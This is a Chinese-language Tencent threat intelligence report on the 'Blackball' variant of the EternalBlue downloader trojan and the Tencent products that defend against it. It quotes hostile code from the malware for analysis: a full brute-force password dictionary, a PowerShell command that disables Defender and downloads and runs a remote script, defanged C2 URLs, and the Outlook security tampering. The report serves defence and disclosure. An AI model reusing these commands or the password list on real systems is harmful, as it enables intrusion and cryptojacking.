永恆之藍木馬下載器發起 「黑球」行動,新增SMBGhost漏洞檢測能力

長按二維碼關注

御見威脅情報中心

騰訊安全威脅情報中心檢測到永恆之藍下載器木馬出現最新變種，此次變種的病毒延續上個版本的郵件蠕蟲攻擊方法，利用附帶Office漏洞CVE-2017-8570漏洞的doc文檔以及JS誘餌文件發送與新冠肺炎主題相關的釣魚郵件。同時新增SMBGhost（CVE-2020-0796）漏洞檢測和上報、新增SSH爆破攻擊相關代碼，推測其可能在後續攻擊活動中利用SMBGhost漏洞、也可能發起針對Linux系統的攻擊。

 

病毒Payload執行時安裝隨機名計劃任務從新的C2地址t.zer9g.com、t.zz3r0.com下載a.jsp進行持久化攻擊，a.jsp繼續下載攻擊模塊if.bin、if_mail.bin以利用漏洞、弱口令爆破、釣魚郵件群發等方式進行攻擊傳播，將XMRig門羅幣礦機程序m6.bin、m6g.bin注入Powershell.exe運行。病毒還會安裝沒有實際功能的計劃任務blackball（「黑球」），因此將此次攻擊命名為「黑球」行動。

 

騰訊安全系列產品應對永恆之藍下載器木馬「黑球」變種的響應清單：

應用

場景

安全產品

解決方案

威

脅

情

報

騰訊T-Sec

威脅情報雲查服務

（SaaS）

1）永恆之藍下載器木馬黑產團夥相關IOCs已入庫。

各類安全產品可通過「威脅情報雲查服務」提供的接口提升威脅識別能力。

可參考:https://cloud.tencent.com/product/tics

騰訊T-Sec

高級威脅追溯系統

1）永恆之藍下載器木馬黑產團夥相關信息和情報已支持檢索。

網管可通過威脅追溯系統，分析日誌，進行線索研判、追溯網絡入侵源頭。

T-Sec高級威脅追溯系統的更多信息，可參考：https://cloud.tencent.com/product/atts

雲原生安全

防護

雲防火牆

（Cloud Firewall，CFW）

基於網絡流量進行威脅檢測與主動攔截，已支持：

1）利用永恆之藍漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相關聯的IOCs已支持識別檢測；

2）支持下發訪問控制規則封禁目標埠，主動攔截永恆之藍漏洞MS17-010、SMBGhost漏洞CVE-2020-0796洞相關訪問流量。

 

有關雲防火牆的更多信息，可參考：
 https://cloud.tencent.com/product/cfw

騰訊T-Sec  主機安全

（Cloud Workload  Protection，CWP）

1）雲鏡已支持永恆之藍漏洞MS17-010、SMBGhost漏洞CVE-2020-0796的檢測；

2）已支持查殺利用永恆之藍漏洞MS17-010、SMBGhost漏洞CVE-2020-0796入侵的挖礦木馬、後門程序。

 

騰訊主機安全（雲鏡）提供雲上終端的防毒殺毒、防入侵、漏洞管理、基線管理等。關於T-Sec主機安全的更多信息，可參考：https://cloud.tencent.com/product/cwp

騰訊T-Sec 網絡資產風險監測系統

（騰訊御知）

1）騰訊御知已支持監測全網資產是否受永恆之藍漏洞MS17-010、SMBGhost漏洞CVE-2020-0796影響。

2）已集成無損檢測POC，企業可以對自身資產進行遠程檢測。

關於騰訊T-Sec網絡資產風險監測系統的更多信息，可參考：https://s.tencent.com/product/narms/index.html

騰訊T-Sec 安全運營中心

已接入騰訊主機安全（雲鏡）、騰訊御知等產品數據導入，為客戶提供與SMBGhost漏洞、永恆之藍漏洞、挖礦行為相關的情報、威脅發現、事件處置能力。

 

關於騰訊T-Sec安全運營中心的更多信息，可參考：https://s.tencent.com/product/soc/index.html

非雲企業安全防護

騰訊T-Sec

高級威脅檢測系統

（騰訊御界）

基於網絡流量進行威脅檢測，已支持：

1）利用永恆之藍漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相關聯的IOCs已支持識別檢測；

2）對利用永恆之藍漏洞MS17-010、SMBGhost漏洞CVE-2020-0796協議特徵進行識別檢測；

3）支持挖礦木馬的異常流量檢測

 

關於T-Sec高級威脅檢測系統的更多信息，可參考：

https://cloud.tencent.com/product/nta

騰訊T-Sec終端安全管理系統（御點）

1）可查殺永恆之藍下載器木馬團夥入侵釋放的後門木馬、挖礦木馬程序；

2）企業終端管理系統已支持檢測黑產利用永恆之藍漏洞MS17-010、SMBGhost漏洞CVE-2020-0796入侵相關的網絡通信。

3）企業終端管理系統已支持檢測利用Lnk漏洞CVE-2017-8464、Office漏洞CVE-2017-8570攻擊的病毒程序；

 

騰訊御點提供企業終端的防毒殺毒、防入侵、漏洞管理、基線管理等能力，關於T-Sec終端安全管理系統的更多資料，可參考：https://s.tencent.com/product/yd/index.html

更多產品信息，請參考騰訊安全官方網站https://s.tencent.com/

首先從outlook應用程式會話中獲取郵箱聯繫人。

 

然後自動生成readme.doc，readme.js兩種附件文件，並將readme.js製作為壓縮包readme.zip。其中readme.doc中包含Office漏洞CVE-2017-8570觸發代碼。readme.js中包含惡意Wscript腳本攻擊代碼。兩種附件被打開後都會執行惡意命令下載http[:]//d.ackng.com/mail.jsp。

 

在$mail.Body中添加待發送郵件的郵件主題內容，從預置的9個主題中隨機選擇，主要包含「新冠肺炎COVID-19」， 「日常聯繫對話」，「文件損壞無法查看」三種類型，具體內容如下：

生成的釣魚郵件示例如下：

 

最後針對郵箱中發現的每一個聯繫人，依次發送包含惡意代碼的附件readme.doc、readme.zip的郵件。

RDP（3389埠）弱口令爆破

爆破用戶名：「administrator」，密碼字典：

"saadmin","123456","test1","zinch","g_czechout","asdf","Aa123456.","dubsmash","password","PASSWORD","123.com","admin@123","Aa123456","qwer12345","Huawei@123","123@abc","golden","123!@#qwe","1qaz@WSX","Ab123","1qaz!QAZ","Admin123","Administrator","Abc123","Admin@123","999999","Passw0rd","123qwe!@#","football","welcome","1","12","21","123","321","1234","12345","123123","123321","111111","654321","666666","121212","000000","222222","888888","1111","555555","1234567","12345678","123456789","987654321","admin","abc123","abcd1234","abcd@1234","abc@123","p@ssword","P@ssword","p@ssw0rd","P@ssw0rd","P@SSWORD","P@SSW0RD","P@w0rd","P@word","iloveyou","monkey","login","passw0rd","master","hello","qazwsx","password1","Password1","qwerty","baseball","qwertyuiop","superman","1qaz2wsx","fuckyou","123qwe","zxcvbn","pass","aaaaaa","love","administrator","qwe1234A","qwe1234a","123123123","1234567890","88888888","111111111","112233","a123456","123456a","5201314","1q2w3e4r","qwe123","a123456789","123456789a","dragon","sunshine","princess","!@#$%^&*","charlie","aa123456","homelesspa","1q2w3e4r5t","sa","sasa","sa123","sql2005","sa2008","abc","abcdefg","sapassword","Aa12345678","ABCabc123","sqlpassword","sql2008","11223344","admin888","qwe1234","A123456","OPERADOR","Password123","test123","NULL","user","test","Password01","stagiaire","demo","scan","P@ssw0rd123","xerox","compta"。
 
爆破成功後會上報該機器的IP以及此次成功登陸使用的密碼，然後利用rdpexec模塊遠程執行代碼$rdp_code:
cmd /c powershell Set-MpPreference-DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe&powershellIEX(New-Object Net.WebClient).DownloadString(''http[:]
 
SMB爆破攻擊（445埠）
爆破使用用戶名為"administrator","admin"，爆破成功後遠程執行代碼$ipc_code：
MSSQL爆破攻擊（1433埠）
使用與RDP爆破同樣的密碼字典，爆破成功後遠程執行代碼$mscmd_code：
 
此外，最新的攻擊代碼中還加如了SSH爆破相關命令，該代碼將會啟動SSH爆破模塊，並在爆破成功後執行遠程命令$ssh_cmd。但是目前該功能並未啟用，相關可能還在開發階段，後續如果啟用之後，可能會導致被感染的Windows機器通過SSH爆破攻擊Linux系統。
1)   SMBGhost漏洞利用
永恆之藍下載器木馬變種會利用公開的漏洞檢測代碼檢測存在SMBGhost漏洞（編號：CVE-2020-0796、綽號：永恆之黑）的機器IP並上報。
 
2020年3月12日騰訊安全威脅情報中心發布了SMBv3遠程代碼執行漏洞CVE-2020-0796（別名：SMBGhost，綽號：永恆之黑）預警公告：
https://mp.weixin.qq.com/s/zwuDziMherWbUY2S2rrD8Q
 
2020年6月2日，國外安全研究員公開了一份SMBGhost漏洞CVE-2020-0796漏洞的RCE代碼，騰訊安全團隊已對其進行分析並預警：
https://mp.weixin.qq.com/s/LDWRacyVMAu2JGZUJf3qKQ
 
該漏洞的後果十分接近永恆之藍系列，都利用Windows SMB漏洞遠程攻擊獲取系統最高權限，除了直接攻擊SMB服務端造成RCE外，攻擊者可以構造特定的網頁，壓縮包，共享目錄，OFFICE文檔等多種方式觸發漏洞進行攻擊。由於漏洞利用原始碼被公布，使得漏洞利用風險驟然升級，被黑灰產修改即可用於網絡攻擊。
2)   永恆之藍漏洞利用

利用永恆之藍漏洞攻擊，攻擊後遠程執行代碼$sc_code。
3)   Lnk漏洞（CVE-2017-8464）利用

Lnk漏洞利用CVE-2017-8464，在可移動盤、網絡磁碟下創建具有CVE-2017-8464漏洞攻擊代碼的Lnk文件，一旦該文件被查看就會導致惡意代碼執行。同時還會釋放JS文件readme.js，通過偽裝的文件在被誤點擊時感染病毒。
永恆之藍下載器木馬在攻擊代碼if.bin中Killer()函數中會詳細地搜集大量競爭對手挖礦木馬的信息，包括各類挖礦木馬安裝的服務、計劃任務、進程名，以及挖礦使用的命令行特點、埠號特點來鎖定目標並進行清除。
 
通過服務名匹配：
$SrvName ="xWinWpdSrv", "SVSHost", "Microsoft Telemetry", "lsass", "Microsoft", "system", "Oracleupdate", "CLR", "sysmgt", "\gm", "WmdnPnSN", "Sougoudl","National", "Nationaaal", "Natimmonal", "Nationaloll", "Nationalmll","Nationalaie","Nationalwpi","WinHelp32","WinHelp64", "Samserver", "RpcEptManger", "NetMsmqActiv Media NVIDIA", "Sncryption Media Playeq","SxS","WinSvc","mssecsvc2.1","mssecsvc2.0","Windows_Update","Windows Managers","SvcNlauser","WinVaultSvc","Xtfy","Xtfya","Xtfyxxx","360rTys","IPSECS","MpeSvc","SRDSL","WifiService","ALGM","wmiApSrvs","wmiApServs","taskmgr1","WebServers","ExpressVNService","WWW.DDOS.CN.COM","WinHelpSvcs","aspnet_staters","clr_optimization","AxInstSV","Zational","DNS Server","Serhiez","SuperProServer",".Net CLR","WissssssnHelp32","WinHasdadelp32","WinHasdelp32","ClipBooks"
 
通過計劃任務名匹配：
$TaskName = "my1","Mysa", "Mysa1", "Mysa2", "Mysa3", "ok", "Oracle Java", "Oracle Java Update", "Microsoft Telemetry", "Spooler SubSystem Service","Oracle Products Reporter", "Update service for  products", "gm", "ngm","Sorry","Windows_Update","Update_windows","WindowsUpdate1","WindowsUpdate2","WindowsUpdate3","AdobeFlashPlayer","FlashPlayer1","FlashPlayer2","FlashPlayer3","IIS","WindowsLogTasks","System Log Security Check","Update","Update1","Update2","Update3","Update4","DNS","SYSTEM","DNS2","SYSTEMa","skycmd","Miscfost","Netframework","Flash","RavTask","GooglePingConfigs","HomeGroupProvider","MiscfostNsi","WwANsvc","Bluetooths","Ddrivers","DnsScan","WebServers","Credentials","TablteInputout","werclpsyport","HispDemorn","LimeRAT-Admin","DnsCore","Update service for Windows Service","DnsCore","ECDnsCore"
 
通過命令行特徵匹配：
$_.CommandLine -like'*pool.monero.hashvault.pro*' -Or $_.CommandLine -like '*blazepool*' -Or$_.CommandLine -like '*blockmasters*' -Or $_.CommandLine -like'*blockmasterscoins*' -Or $_.CommandLine -like '*bohemianpool*' -Or$_.CommandLine -like '*cryptmonero*' -Or $_.CommandLine -like '*cryptonight*'-Or $_.CommandLine -like '*crypto-pool*' -Or $_.CommandLine -like'*--donate-level*' -Or $_.CommandLine -like '*dwarfpool*' -Or $_.CommandLine-like '*hashrefinery*' -Or $_.CommandLine -like '*hashvault.pro*' -Or$_.CommandLine -like '*iwanttoearn.money*' -Or $_.CommandLine -like'*--max-cpu-usage*' -Or $_.CommandLine -like '*mine.bz*' -Or $_.CommandLine-like '*minercircle.com*' -Or $_.CommandLine -like '*minergate*' -Or$_.CommandLine -like '*miners.pro*' -Or $_.CommandLine -like '*mineXMR*' -Or$_.CommandLine -like '*minexmr*' -Or $_.CommandLine -like '*mineXMR*' -Or$_.CommandLine -like '*mineXMR*' -Or $_.CommandLine -like'*miningpoolhubcoins*' -Or $_.CommandLine -like '*mixpools.org*' -Or$_.CommandLine -like '*mixpools.org*' -Or $_.CommandLine -like '*monero*' -Or$_.CommandLine -like '*monero*' -Or $_.CommandLine -like'*monero.lindon-pool.win*' -Or $_.CommandLine -like '*moriaxmr.com*' -Or $_.CommandLine-like '*mypool.online*' -Or $_.CommandLine -like '*nanopool.org*' -Or$_.CommandLine -like '*nicehash*' -Or $_.CommandLine -like '*-p x*' -Or$_.CommandLine -like '*pool.electroneum.hashvault.pro*' -Or $_.CommandLine-like '*pool.xmr*' -Or $_.CommandLine -like '*poolto.be*' -Or $_.CommandLine-like '*prohash*' -Or $_.CommandLine -like '*prohash.net*' -Or $_.CommandLine-like '*ratchetmining.com*' -Or $_.CommandLine -like '*slushpool*' -Or$_.CommandLine -like '*stratum+*' -Or $_.CommandLine -like '*suprnova.cc*' -Or$_.CommandLine -like '*teracycle.net*' -Or $_.CommandLine -like '*usxmrpool*'-Or $_.CommandLine -like '*viaxmr.com*' -Or $_.CommandLine -like '*xmrpool*'-Or $_.CommandLine -like '*yiimp*' -Or $_.CommandLine -like '*zergpool*' -Or $_.CommandLine-like '*zergpoolcoins*' -Or $_.CommandLine -like '*zpool*'
 
通過網絡埠匹配：
($psids[0] -eq $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":1111") -or $t.contains(":2222") -or $t.contains(":3333") -or $t.contains(":4444") -or $t.contains(":5555") -or $t.contains(":6666") -or $t.contains(":7777") -or $t.contains(":8888") -or $t.contains(":9999") -or $t.contains(":14433") -or $t.contains(":14444") -or $t.contains(":45560") -or $t.contains(":65333"))
 
通過進程名匹配：
$Miner ="SC","WerMgr","WerFault","DW20","msinfo", "XMR*","xmrig*", "minerd", "MinerGate", "Carbon", "yamm1", "upgeade", "auto-upgeade", "svshost","SystemIIS", "SystemIISSec", 'WindowsUpdater*', "WindowsDefender*", "update", "carss", "service", "csrsc", "cara", "javaupd", "gxdrv", "lsmosee", "secuams", "SQLEXPRESS_X64_86", "Calligrap", "Sqlceqp", "Setting", "Uninsta", "conhoste","Setring","Galligrp","Imaging","taskegr","Terms.EXE","360","8866","9966","9696","9797","svchosti","SearchIndex","Avira","cohernece","win","SQLforwin","xig*","taskmgr1","Workstation","ress","explores"
通過爆破、RCE漏洞攻擊、釣魚郵件攻擊後會下載和執行Powershell代碼：
http[:]//t.amynx.com/mail.jsp或http[:]//t.amynx.com/usb.jsp
 
mail.jsp更新C2地址為：t.amynx.com、t.zer9g.com、t.zz3r0.com，並且安裝計劃任務blackball（「黑球」），該計劃任務無實際代碼執行。
 
然後mail.jsp安裝三個隨機名計劃任務（分別為<random>、<random>\<random>、MicroSoft\Windows\<random>），執行命令為「PS_CMD」。之後三個計劃任務中的命令「PS_CMD」被替換為下載和執行Powershell代碼http[:]//t.awcna.com/a.jsp、http[:]//t.zer9g.com/a.jsp、http[:]//t.zz3r0.com /a.jsp以達到持久化攻擊。
 
a.jsp負責下載攻擊模塊if.bin執行漏洞利用和弱口令爆破功能。下載門羅幣挖礦模塊m6.bin、m6g.bin，並通過Invoke-ReflectivePEInjection將XMR挖礦木馬注入Powershell.exe運行，連接礦池lplp.ackng.com:443挖礦，導致CPU佔用率接近100%。
 
將OutLook註冊表 「*\Outlook\Security」下的ObjectModelGuard值設為2，即不對outlook任何可疑活動進行提示。
 
然後下載和執行Powershell版郵件蠕蟲攻擊程序http[:]//d.ackng.com/if_mail.bin，獲取郵箱所有聯繫人，依次發送釣魚郵件，進入下一輪攻擊流程。
根據騰訊安全威脅情報中心持續跟蹤結果，永恆之藍下載器木馬在2018~2020間，已升級十餘次，歷次變化情況如下：
 
IOCs
Domain
t.amynx.com
t.zer9g.com
t.zz3r0.com
d.ackng.com
 
URL：
http[:]//d.ackng.com/if_mail.bin
http[:]//d.ackng.com/if.bin
http[:]//t.zer9g.com/a.jsp
http[:]//t.zz3r0.com/a.jsp
http[:]//t.amynx.com/mail.jsp
 
md5
if.bin
e5ae6d154a6befc00deea0ccb49dc9b8
if_mail.bin
88949e6a329c6b2796ddcc81564cee1a
a.jsp
e3687c56b8be535398051405f8221d82
usb.jsp
7805776504e8a39c2a892d89e2492c12
mail.jsp
cc67b69740c7bd0744acd3242729ce15
 
參考連結：
「來自「藍茶」的問候：「你是不是瘋了」，暗藏新攻擊手法」
https://mp.weixin.qq.com/s/bibSEjfLnuOA9vyEMHkv9Q
 
「SMBGhost漏洞（CVE-2020-0796）利用源碼公開，安全風險驟然升級」
https://mp.weixin.qq.com/s/LDWRacyVMAu2JGZUJf3qKQ